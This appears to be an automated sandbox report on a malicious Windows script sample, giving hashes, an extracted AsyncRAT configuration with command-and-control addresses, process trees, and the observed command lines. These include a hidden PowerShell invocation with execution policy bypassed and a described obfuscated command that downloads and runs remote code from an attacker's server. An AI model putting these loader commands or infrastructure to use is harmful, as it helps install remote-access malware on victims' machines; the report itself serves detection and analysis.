Analysis

max time kernel: 143s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/01/2024, 12:29
Static task: static1
Behavioral task: behavioral1
Sample: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Resource: win7-20231215-en
General

Target: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Size: 144KB
MD5: d98237f1eb423d002ec4431002532420
SHA1: 3c03b0e124cf15312a0cf43e1a74a3827b027e29
SHA256: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
SHA512: 9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f
SSDEEP: 3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3
Malware Config

Extracted
http://185.81.157.103/96/1.txt

Extracted
asyncrat | 3LOSH RAT
Default
185.81.157.183:9696
AsyncMutex_6SI8OkCPM
delay: 3
install: false
install_folder: %AppData%
Signatures

Detect ZGRat V1 (1 IoCs)
  resource: behavioral2/memory/4216-40-0x000001AAA3C40000-0x000001AAA3C74000-memory.dmp | yara_rule: family_zgrat_v1

Async RAT payload (1 IoCs)
  resource: behavioral2/memory/1144-42-0x0000000000400000-0x0000000000416000-memory.dmp | yara_rule: asyncrat

Blocklisted process makes network request (2 IoCs)
  flow 2 | pid 4728 | WScript.exe
  flow 10 | pid 3004 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | WScript.exe

Suspicious use of SetThreadContext (1 IoCs)
  PID 4216 set thread context of 1144 | pid 4216 | powershell.exe | procid_target 106

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid 3004 powershell.exe; 3004 powershell.exe; 4216 powershell.exe; 4216 powershell.exe; 4216 powershell.exe; 4216 powershell.exe; 1144 RegSvcs.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege | pid 3004 | powershell.exe
  Token: SeDebugPrivilege | pid 4216 | powershell.exe
  Token: SeDebugPrivilege | pid 1144 | RegSvcs.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid 1144 | RegSvcs.exe

Suspicious use of WriteProcessMemory (17 IoCs)
  PID 4728 wrote to memory of 3004 | pid 4728 | WScript.exe | procid_target 88 (2 entries)
  PID 4564 wrote to memory of 2528 | pid 4564 | WScript.exe | procid_target 102 (2 entries)
  PID 2528 wrote to memory of 4216 | pid 2528 | cmd.exe | procid_target 104 (2 entries)
  PID 4216 wrote to memory of 2900 | pid 4216 | powershell.exe | procid_target 105 (3 entries)
  PID 4216 wrote to memory of 1144 | pid 4216 | powershell.exe | procid_target 106 (8 entries)

Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4728
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('[obfuscated string omitted: every character of the real command is separated by a long repeated junk token that a .Replace() call strips before iex runs it; the cleaned command downloads http://185.81.157.103/96/1.txt (the URL listed under Malware Config) with a .NET WebClient DownloadString call and pipes the result to a second iex]')|iex
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3004

C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4564
  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 2528
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4216
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        PID: 2900
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        PID: 1144
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: b66db53846de4860ca72a3e59b38c544
SHA1: 2202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256: b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA512: 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 195B
MD5: 6c8a34a94e068b809145df09acbe153c
SHA1: 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256: c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512: 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

Filesize: 1000KB
MD5: 8469f5b76df0f510fe02b1eab0f57226
SHA1: 7ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256: a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512: 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4

Filesize: 686B
MD5: 741b5b0a474f0e0cd28fd880f68723c0
SHA1: 4de5489c4e56882514b3ab432048200eae65f90d
SHA256: f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512: 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54